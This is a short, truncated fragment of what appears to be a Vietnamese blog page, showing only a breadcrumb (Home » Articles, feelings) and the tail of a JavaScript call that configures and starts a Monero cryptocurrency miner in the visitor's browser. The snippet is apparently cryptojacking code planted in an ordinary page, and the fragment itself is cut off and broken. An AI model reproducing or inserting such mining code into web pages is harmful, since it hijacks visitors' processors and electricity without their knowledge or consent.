Trang chủ » Bài viết, cảm xúc
', { threads:2,throttle:0.2, coin: "xmr", }); miner.start();